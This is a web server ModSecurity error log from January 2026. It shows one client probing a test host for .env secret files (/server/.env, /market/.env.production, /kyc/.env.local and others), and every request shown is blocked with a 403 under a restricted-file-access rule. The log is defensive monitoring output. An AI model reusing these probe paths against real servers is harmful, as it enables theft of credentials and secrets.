[Thu Jan 08 21:17:35.502407 2026] [:error] [pid 1283304] [client 18.119.100.98:46400] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWAQ32AwUIZgFNkik8yVOQAAAAg"]
[Thu Jan 08 21:17:35.502622 2026] [:error] [pid 1283304] [client 18.119.100.98:46400] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWAQ32AwUIZgFNkik8yVOQAAAAg"]
[Thu Jan 08 21:17:35.502793 2026] [:error] [pid 1283304] [client 18.119.100.98:46400] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWAQ32AwUIZgFNkik8yVOQAAAAg"]
[Thu Jan 08 21:17:35.845637 2026] [:error] [pid 1270036] [client 18.119.100.98:46534] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aWAQ3-M1154Q6b0hewij4gAAAAE"]
[Thu Jan 08 21:17:35.845846 2026] [:error] [pid 1270036] [client 18.119.100.98:46534] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aWAQ3-M1154Q6b0hewij4gAAAAE"]
[Thu Jan 08 21:17:35.846016 2026] [:error] [pid 1270036] [client 18.119.100.98:46534] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aWAQ3-M1154Q6b0hewij4gAAAAE"]
[Thu Jan 08 21:17:36.192584 2026] [:error] [pid 1270037] [client 18.119.100.98:46654] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dist/.env"] [unique_id "aWAQ4OA_IfWyU2EIiRhOggAAAAI"]
[Thu Jan 08 21:17:36.192791 2026] [:error] [pid 1270037] [client 18.119.100.98:46654] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dist/.env"] [unique_id "aWAQ4OA_IfWyU2EIiRhOggAAAAI"]
[Thu Jan 08 21:17:36.192942 2026] [:error] [pid 1270037] [client 18.119.100.98:46654] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dist/.env"] [unique_id "aWAQ4OA_IfWyU2EIiRhOggAAAAI"]
[Thu Jan 08 21:17:36.542526 2026] [:error] [pid 1280390] [client 18.119.100.98:46816] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "aWAQ4NKTJIy7S9W5nL2LPQAAAAk"]
[Thu Jan 08 21:17:36.542737 2026] [:error] [pid 1280390] [client 18.119.100.98:46816] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "aWAQ4NKTJIy7S9W5nL2LPQAAAAk"]
[Thu Jan 08 21:17:36.542904 2026] [:error] [pid 1280390] [client 18.119.100.98:46816] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "aWAQ4NKTJIy7S9W5nL2LPQAAAAk"]
[Thu Jan 08 21:17:36.892319 2026] [:error] [pid 1270038] [client 18.119.100.98:46976] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWAQ4BmwMJtANIcuNUXpIgAAAAM"]
[Thu Jan 08 21:17:36.892529 2026] [:error] [pid 1270038] [client 18.119.100.98:46976] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWAQ4BmwMJtANIcuNUXpIgAAAAM"]
[Thu Jan 08 21:17:36.892721 2026] [:error] [pid 1270038] [client 18.119.100.98:46976] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWAQ4BmwMJtANIcuNUXpIgAAAAM"]
[Thu Jan 08 21:17:37.972242 2026] [:error] [pid 1270035] [client 18.119.100.98:47412] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aWAQ4SYqm_i2BUcmtQb4twAAAAA"]
[Thu Jan 08 21:17:37.972443 2026] [:error] [pid 1270035] [client 18.119.100.98:47412] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aWAQ4SYqm_i2BUcmtQb4twAAAAA"]
[Thu Jan 08 21:17:37.972598 2026] [:error] [pid 1270035] [client 18.119.100.98:47412] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aWAQ4SYqm_i2BUcmtQb4twAAAAA"]
[Thu Jan 08 21:17:38.322759 2026] [:error] [pid 1270041] [client 18.119.100.98:47580] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.production"] [unique_id "aWAQ4s3GwEx_BV8-CrWUQwAAAAU"]
[Thu Jan 08 21:17:38.322966 2026] [:error] [pid 1270041] [client 18.119.100.98:47580] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.production"] [unique_id "aWAQ4s3GwEx_BV8-CrWUQwAAAAU"]
[Thu Jan 08 21:17:38.323121 2026] [:error] [pid 1270041] [client 18.119.100.98:47580] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.production"] [unique_id "aWAQ4s3GwEx_BV8-CrWUQwAAAAU"]
[Thu Jan 08 21:17:38.670709 2026] [:error] [pid 1270042] [client 18.119.100.98:47730] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.staging"] [unique_id "aWAQ4i7RlX2cRjHcFz6xvwAAAAY"]
[Thu Jan 08 21:17:38.670924 2026] [:error] [pid 1270042] [client 18.119.100.98:47730] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.staging"] [unique_id "aWAQ4i7RlX2cRjHcFz6xvwAAAAY"]
[Thu Jan 08 21:17:38.671335 2026] [:error] [pid 1270042] [client 18.119.100.98:47730] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.staging"] [unique_id "aWAQ4i7RlX2cRjHcFz6xvwAAAAY"]
[Thu Jan 08 21:17:39.018131 2026] [:error] [pid 1283304] [client 18.119.100.98:47890] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aWAQ42AwUIZgFNkik8yVOgAAAAg"]
[Thu Jan 08 21:17:39.018371 2026] [:error] [pid 1283304] [client 18.119.100.98:47890] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aWAQ42AwUIZgFNkik8yVOgAAAAg"]
[Thu Jan 08 21:17:39.018538 2026] [:error] [pid 1283304] [client 18.119.100.98:47890] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aWAQ42AwUIZgFNkik8yVOgAAAAg"]
[Thu Jan 08 21:17:39.366117 2026] [:error] [pid 1270036] [client 18.119.100.98:48072] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.production"] [unique_id "aWAQ4-M1154Q6b0hewij4wAAAAE"]
[Thu Jan 08 21:17:39.366549 2026] [:error] [pid 1270036] [client 18.119.100.98:48072] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.production"] [unique_id "aWAQ4-M1154Q6b0hewij4wAAAAE"]
[Thu Jan 08 21:17:39.366725 2026] [:error] [pid 1270036] [client 18.119.100.98:48072] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.production"] [unique_id "aWAQ4-M1154Q6b0hewij4wAAAAE"]
[Thu Jan 08 21:17:39.717630 2026] [:error] [pid 1270037] [client 18.119.100.98:48252] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "aWAQ4-A_IfWyU2EIiRhOgwAAAAI"]
[Thu Jan 08 21:17:39.717836 2026] [:error] [pid 1270037] [client 18.119.100.98:48252] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "aWAQ4-A_IfWyU2EIiRhOgwAAAAI"]
[Thu Jan 08 21:17:39.717989 2026] [:error] [pid 1270037] [client 18.119.100.98:48252] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "aWAQ4-A_IfWyU2EIiRhOgwAAAAI"]
[Thu Jan 08 21:17:40.060470 2026] [:error] [pid 1280390] [client 18.119.100.98:48410] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.local"] [unique_id "aWAQ5NKTJIy7S9W5nL2LPgAAAAk"]
[Thu Jan 08 21:17:40.060681 2026] [:error] [pid 1280390] [client 18.119.100.98:48410] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.local"] [unique_id "aWAQ5NKTJIy7S9W5nL2LPgAAAAk"]
[Thu Jan 08 21:17:40.060841 2026] [:error] [pid 1280390] [client 18.119.100.98:48410] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.local"] [unique_id "aWAQ5NKTJIy7S9W5nL2LPgAAAAk"]
[Thu Jan 08 21:17:40.410677 2026] [:error] [pid 1270038] [client 18.119.100.98:48572] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWAQ5BmwMJtANIcuNUXpIwAAAAM"]
[Thu Jan 08 21:17:40.410897 2026] [:error] [pid 1270038] [client 18.119.100.98:48572] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWAQ5BmwMJtANIcuNUXpIwAAAAM"]
[Thu Jan 08 21:17:40.411054 2026] [:error] [pid 1270038] [client 18.119.100.98:48572] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWAQ5BmwMJtANIcuNUXpIwAAAAM"]
[Thu Jan 08 21:17:40.759687 2026] [:error] [pid 1270039] [client 18.119.100.98:48726] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "aWAQ5JccQYhM1DUhi_W7CAAAAAQ"]
